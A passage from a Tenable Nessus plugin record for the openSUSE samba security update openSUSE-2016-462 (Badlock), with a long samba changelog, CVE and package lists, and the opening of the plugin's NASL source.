(bso#11234).\n\n - libads: record service ticket endtime for sealed ldap connections;\n\n - lib/util: Include DEBUG macro in internal header files before samba_util.h; (bso#11033).\n\n - Initialize dwFlags field of DNS_RPC_NODE structure;\n (bso#9791).\n\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't set, cope with servers that don't send the 2 unused fields; (bso#10016).\n\n - build:wafadmin: Fix use of spaces instead of tabs;\n (bso#10476).\n\n - waf: Fix the build on openbsd; (bso#10476).\n\n - s3: client: 'client use spnego principal = yes' code checks wrong name;\n\n - spoolss: Retrieve published printer GUID if not in registry; (bso#11018).\n\n - vfs_fruit: Enhance handling of malformed AppleDouble files; (bso#11125).\n\n - backupkey: Explicitly link to gnutls and gcrypt;\n (bso#11135).\n\n - replace: Remove superfluous check for gcrypt header;\n (bso#11135).\n\n - Backport subunit changes; (bso#11137).\n\n - libcli/auth: Match Declaration of netlogon_creds_cli_context_tmp with implementation;\n (bso#11140).\n\n - s3-winbind: Fix cached user group lookup of trusted domains; (bso#11143).\n\n - talloc: Version 2.1.2; (bso#11144).\n\n - Update libwbclient version to 0.12; (bso#11149).\n\n - brlock: Use 0 instead of empty initializer list;\n (bso#11153).\n\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n\n - Fix lots of winbindd zombie processes on Solaris platform; (bso#11175).\n\n - Prevent samba package updates from disabling samba kerberos printing.\n\n - Add sparse file support for samba; (fate#318424).\n\n - Simplify libxslt build requirement and README.SUSE install.\n\n - Remove no longer required cleanup steps while populating the build root.\n\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT;\n (bso#1115).\n\n - pam_winbind: fix warn_pwd_expire implementation;\n (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules;\n (bso#9299).\n\n - Make 'profiles' work again; (bso#9629).\n\n - s3:smb2_server: protect against integer wrap with 'smb2 max credits = 65535'; (bso#9702).\n\n - Make validate_ldb of String(Generalized-Time) accept millisecond format '.000Z'; (bso#9810).\n\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n\n - vfs: Add glusterfs manpage; (bso#10240).\n\n - Make 'smbclient' use cached creds; (bso#10279).\n\n - pdb: Fix build issues with shared modules; (bso#10355).\n\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n\n - idmap: Return the correct id type to *id_to_sid methods;\n (bso#10720).\n\n - printing/cups: Pack requested-attributes with IPP_TAG_KEYWORD; (bso#10808).\n\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n\n - nss_winbind: Add getgroupmembership for FreeBSD;\n (bso#10835).\n\n - idmap_rfc2307: Fix a crash after connection problem to DC; (bso#10837).\n\n - s3: smb2cli: query info return length check was reversed; (bso#10848).\n\n - s3: lib, s3: modules: Fix compilation on Solaris;\n (bso#10849).\n\n - lib: uid_wrapper: Fix setgroups and syscall detection on a system without native uid_wrapper library;\n (bso#10851).\n\n - winbind3: Fix pwent variable substitution; (bso#10852).\n\n - Improve samba-regedit; (bso#10859).\n\n - registry: Don't leave dangling transactions;\n (bso#10860).\n\n - Fix build of socket_wrapper on systems without SO_PROTOCOL; (bso#10861).\n\n - build: Do not install 'texpect' binary anymore;\n (bso#10862).\n\n - Fix testparm to show hidden share defaults; (bso#10864).\n\n - libcli/smb: Fix smb2cli_validate_negotiate_info with min=PROTOCOL_NT1 max=PROTOCOL_SMB2_02; (bso#10866).\n\n - Integrate CTDB into top-level Samba build; (bso#10892).\n\n - samba-tool group add: Add option '--nis-domain' and '--gid'; (bso#10895).\n\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels;\n (bso#10898).\n\n - Fix smbclient loops doing a directory listing against Mac OS X 10 server with a non-wildcard path;\n (bso#10904).\n\n - Fix print job enumeration; (bso#10905); (boo#898031).\n\n - samba-tool: Create NIS enabled users and unixHomeDirectory attribute; (bso#10909).\n\n - Add support for SMB2 leases; (bso#10911).\n\n - btrfs: Don't leak opened directory handle; (bso#10918).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored; (bso#10920).\n\n - s3:smbd: Fix file corruption using 'write cache size != 0'; (bso#10921).\n\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n\n - s3-keytab: fix keytab array NULL termination;\n (bso#10933).\n\n - s3:passdb: fix logic in pdb_set_pw_history();\n (bso#10940).\n\n - Cleanup add_string_to_array and usage; (bso#10942).\n\n - dbwrap_ctdb: Pass on mutex flags to tdb_open;\n (bso#10942).\n\n - Fix RootDSE search with extended dn control;\n (bso#10949).\n\n - Fix 'samba-tool dns serverinfo <server>' for IPv6;\n (bso#10952).\n\n - libcli/smb: only force signing of smb2 session setups when binding a new session; (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares;\n (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output;\n (bso#10961).\n\n - socket_wrapper: Add missing prototype check for eventfd;\n (bso#10965).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows client does; (bso#10966).\n\n - vfs_streams_xattr: Check stream type; (bso#10971).\n\n - s3: smbd: Fix *allocate* calls to follow POSIX error return convention; (bso#10982).\n\n - vfs_fruit: Add support for AAPL; (bso#10983).\n\n - Fix spoolss IDL response marshalling when returning error without clearing info; (bso#10984).\n\n - dsdb-samldb: Check for extended access rights before we allow changes to userAccountControl; (bso#10993);\n CVE-2014-8143; (boo#914279).\n\n - Fix IPv6 support in CTDB; (bso#10996).\n\n - ctdb-daemon: Use correct tdb flags when enabling robust mutex support; (bso#11000).\n\n - vfs_streams_xattr: Add missing call to SMB_VFS_NEXT_CONNECT; (bso#11005).\n\n - s3-util: Fix authentication with long hostnames;\n (bso#11008).\n\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n\n - packaging: Include CTDB man pages in the tarball;\n (bso#11014).\n\n - pdb_get_trusteddom_pw() fails with non valid UTF16 random passwords; (bso#11016).\n\n - Make Sharepoint search show user documents; (bso#11022).\n\n - nss_wrapper: check for nss.h; (bso#11026).\n\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n\n - lib/util: Avoid collision which alread defined consumer DEBUG macro; (bso#11033).\n\n - winbind: Retry after SESSION_EXPIRED error in ping-dc;\n (bso#11034).\n\n - s3-libads: Fix a possible segfault in kerberos_fetch_pac(); (bso#11037).\n\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n\n - vfs_fruit: mmap under FreeBSD needs PROT_READ;\n (bso#11040).\n\n - Fix authentication using Kerberos (not AD); (bso#11044).\n\n - net: Fix sam addgroupmem; (bso#11051).\n\n - vfs_snapper: Correctly handles multi-byte DBus strings;\n (bso#11055); (boo#913238).\n\n - cli_connect_nb_send: Don't segfault on host == NULL;\n (bso#11058).\n\n - utils: Fix 'net time' segfault; (bso#11058).\n\n - libsmb: Provide authinfo domain for encrypted session referrals; (bso#11059).\n\n - s3-pam_smbpass: Fix memory leak in pam_sm_authenticate(); (bso#11066).\n\n - vfs_glusterfs: Add comments to the pipe(2) code;\n (bso#11069).\n\n - vfs/glusterfs: Change xattr key to match gluster key;\n (bso#11069).\n\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n\n - s3-vfs: Fix developer build of vfs_ceph module;\n (bso#11070).\n\n - s3: netlogon: Ensure we don't call talloc_free on an uninitialized pointer; (bso#11077); CVE-2015-0240;\n (boo#917376).\n\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n\n - s3: smbclient: Allinfo leaves the file handle open;\n (bso#11094).\n\n - Fix Win8.1 Credentials Manager issue after KB2992611 on Samba domain; (bso#11097).\n\n - debug: Set close-on-exec for the main log file FD;\n (bso#11100).\n\n - s3: smbd: leases - losen paranoia check. Stat opens can grant leases; (bso#11102).\n\n - s3: smbd: SMB2 close. If a file has delete on close, store the return info before deleting; (bso#11104).\n\n - doc:man:vfs_glusterfs: improve the configuration section; (bso#11117).\n\n - snprintf: Try to support %j; (bso#11119).\n\n - ctdb-io: Do not use sys_write to write to client sockets; (bso#11124).\n\n - doc-xml: Add 'sharesec' reference to 'access based share enum'; (bso#11127).\n\n - Fix usage of freed memory on server exit; (bso#11218);\n (boo#919309).\n\n - Adjust baselibs.conf due to libpdb0 package rename to libsamba-passdb0.\n\n - Add libsamba-debug, libsocket-blocking, libsamba-cluster-support, and libhttp to the libs package; (boo#913547).\n\n - Rebase File Server Remote VSS Protocol (FSRVP) server against 4.2.0rc1; (fate#313346).", "edition": 6, "reporter": "Tenable", "published": "2016-04-18T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2016-462) (Badlock)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5330", "CVE-2016-2112", "CVE-2016-2118", "CVE-2015-3223", "CVE-2015-7560", "CVE-2015-5296", "CVE-2015-8467", "CVE-2015-5252", "CVE-2016-2110", "CVE-2016-2113", "CVE-2015-0240", "CVE-2016-2115", "CVE-2014-8143", "CVE-2015-5370", "CVE-2015-5299", "CVE-2016-2111"], "modified": "2016-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libregistry0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libgensec0", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw0", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libregistry-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libgensec-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test-devel", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:ctdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libsmbldap0-32bit", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2016-462.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=90558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-462.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90558);\n script_version(\"$Revision: 2.5 $\");\n script_cvs_date(\"$Date: 2016/12/07 20:46:54 $\");\n\n script_cve_id(\"CVE-2014-8143\", \"CVE-2015-0240\", \"CVE-2015-3223\", \"CVE-2015-5252\", \"CVE-2015-5296\", \"CVE-2015-5299\", \"CVE-2015-5330\", \"CVE-2015-5370\", \"CVE-2015-7560\", \"CVE-2015-8467\", \"CVE-2016-2110\", \"CVE-2016-2111\", \"CVE-2016-2112\", \"CVE-2016-2113\", \"CVE-2016-2115\", \"CVE-2016-2118\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2016-462) (Badlock)\");\n script_summary(english:\"Check for the openSUSE-2016-462 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"samba was updated to version 4.2.4 to fix 14 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable\n to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded\n NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member\n computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to\n downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing\n (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM\n attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of\n authenticated account were possible (bsc#971965).\n\n - CVE-2015-3223: Malicious request can cause Samba LDAP\n server to hang, spinning using CPU (boo#958581).\n\n - CVE-2015-5330: Remote read memory exploit in LDB\n (boo#958586).\n\n - CVE-2015-5252: Insufficient symlink verification (file\n access outside the share)(boo#958582).\n\n - CVE-2015-5296: No man in the middle protection when\n forcing smb encryption on the client side (boo#958584).\n\n - CVE-2015-5299: Currently the snapshot browsing is not\n secure thru windows previous version (shadow_copy2)\n (boo#958583).\n\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine\n accounts from being changed into user accounts\n (boo#958585).\n\n - CVE-2015-7560: Getting and setting Windows ACLs on\n symlinks can change permissions on link target\n (boo#968222).\n\nThese non-security issues were fixed :\n\n - Fix samba.tests.messaging test and prevent potential tdb\n corruption by removing obsolete now invalid tdb_close\n call; (boo#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and\n libsmbsharemodes-devel from samba-core-devel;\n (boo#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry\n on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man\n page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting\n FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd\n ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode\n when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and\n libpdb-devel from libsamba-passdb-devel while not\n providing it; (boo#972197).\n\n - Upgrade on-disk FSRVP server state to new version;\n (boo#924519).\n\n - Only obsolete but do not provide gplv2/3 package names;\n (boo#968973).\n\n - Enable clustering (CTDB) support; (boo#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (boo#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when\n releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using\n vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when\n keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos\n attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory\n creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete -\n gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we\n access memory allocated on the globals and the global\n being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain\n user; (bso#11569); (boo#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of\n 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow\n an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open\n files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man\n 5 smb.conf; (bso#11619).\n\n - Remove redundant configure options while adding\n with-relro.\n\n - s3: smbd: Fix our access-based enumeration on 'hide\n unreadable' to match Windows; (bso#10252).\n\n - smbd: Fix file name buflen and padding in notify\n repsonse; (bso#10634).\n\n - kerberos: Make sure we only use prompter type when\n available; (bso#11038).\n\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before\n closing the socket; (bso#11316).\n\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus;\n (bso#11327).\n\n - Fix a deadlock in tdb; (bso#11381).\n\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n\n - pam_winbind: Fix a segfault if initialization fails;\n (bso#11502).\n\n - s3: dfs: Fix a crash when the dfs targets are disabled;\n (bso#11509).\n\n - s3: smbd: Fix opening/creating :stream files on the root\n share directory; (bso#11522).\n\n - net: Fix a crash with 'net ads keytab create';\n (bso#11528).\n\n - s3: smbd: Fix a crash in unix_convert() and a NULL\n pointer bug introduced by previous 'raw' stream fix\n (bso#11522); (bso#11535).\n\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c;\n (bso#11543).\n\n - vfs_commit: Set the fd on open before calling\n SMB_VFS_FSTAT; (bso#11547).\n\n - Fix bug in smbstatus where the lease info is not\n printed; (bso#11549).\n\n - s3:smbstatus: Add stream name to share_entry_forall();\n (bso#11550).\n\n - Relocate the tmpfiles.d directory to the client package;\n (boo#947552).\n\n - Do not provide libpdb0 from libsamba-passdb0 but add it\n to baselibs.conf instead; (boo#942716).\n\n - Package /var/lib/samba/private/sock with 0700\n permissions; (boo#946051).\n\n - auth/credentials: If credentials have principal set,\n they are not anonymous anymore; (bso#11265).\n\n - Fix stream names with colon with 'fruit:encoding =\n native'; (bso#11278).\n\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n\n - s3:lib: Fix some corner cases of\n open_socket_out_cleanup(); (bso#11316).\n\n - vfs:fruit: Implement copyfile style copy_chunk;\n (bso#11317).\n\n - ctdb-daemon: Return correct sequence number for\n CONTROL_GET_DB_SEQNUM; (bso#11398).\n\n - ctdb-scripts: Support monitoring of interestingly named\n VLANs on bonds; (bso#11399).\n\n - ctdb-daemon: Improve error handling for running event\n scripts; (bso#11431).\n\n - ctdb-daemon: Check if updates are in flight when\n releasing all IPs; (bso#11432).\n\n - ctdb-build: Fix building of PCP PMDA module;\n (bso#11435).\n\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n\n - Avoid quoting problems in user's DNs; (bso#11488).\n\n - s3-auth: Fix 'map to guest = Bad uid'; (bso#9862).\n\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n\n - s4.2/fsmo.py: Fixed fsmo transfer exception;\n (bso#10924).\n\n - winbindd: Sync secrets.ldb into secrets.tdb on startup;\n (bso#10991).\n\n - Logon via MS Remote Desktop hangs; (bso#11061).\n\n - s3: lib: util: Ensure we read a hex number as %x, not\n %u; (bso#11068).\n\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n\n - s3:param/loadparm: Fix 'testparm --show-all-parameters';\n (bso#11170).\n\n - s3-unix_msg: Remove socket file after closing socket fd;\n (bso#11217).\n\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing\n of interfaces; (bso#11245).\n\n - s3:smb2: Add padding to last command in compound\n requests; (bso#11277).\n\n - Add IPv6 support to ADS client side LDAP connects;\n (bso#11281).\n\n - Add IPv6 support for determining FQDN during ADS join;\n (bso#11282).\n\n - s3: IPv6 enabled DNS connections for ADS client;\n (bso#11283).\n\n - Fix invalid write in ctdb_lock_context_destructor;\n (bso#11293).\n\n - Excessive cli_resolve_path() usage can slow down\n transmission; (bso#11295).\n\n - vfs_fruit: Add option 'veto_appledouble'; (bso#11305).\n\n - tstream: Make socketpair nonblocking; (bso#11312).\n\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query;\n (bso#11313).\n\n - Group creation: Add msSFU30Name only when --nis-domain\n was given; (bso#11315).\n\n - tevent_fd needs to be destroyed before closing the fd;\n (bso#11316).\n\n - Build fails on Solaris 11 with\n '‘PTHREAD_MUTEX_ROBUST’ undeclared';\n (bso#11319).\n\n - smbd/trans2: Add a useful diagnostic for files with bad\n encoding; (bso#11323).\n\n - Change sharesec output back to previous format;\n (bso#11324).\n\n - Robust mutex support broken in 1.3.5; (bso#11326).\n\n - Kerberos auth info3 should contain resource group ids\n available from pac_logon; winbindd:\n winbindd_raw_kerberos_login - ensure logon_info exists\n in PAC; (bso#11328); (boo#912457).\n\n - s3:smb2_setinfo: Fix memory leak in the defer_rename\n case; (bso#11329).\n\n - tevent: Fix CID 1035381 Unchecked return value;\n (bso#11330).\n\n - tdb: Fix CID 1034842 and 1034841 Resource leaks;\n (bso#11331).\n\n - s3: smbd: Use separate flag to track\n become_root()/unbecome_root() state; (bso#11339).\n\n - s3: smbd: Codenomicon crash in do_smb_load_module();\n (bso#11342).\n\n - pidl: Make the compilation of PIDL producing the same\n results if the content hasn't change; (bso#11356).\n\n - winbindd: Disconnect child process if request is\n cancelled at main process; (bso#11358).\n\n - vfs_fruit: Check offset and length for AFP_AfpInfo read\n requests; (bso#11363).\n\n - docs: Overhaul the description of 'smb encrypt' to\n include SMB3 encryption; (bso#11366).\n\n - s3:auth_domain: Fix talloc problem in\n 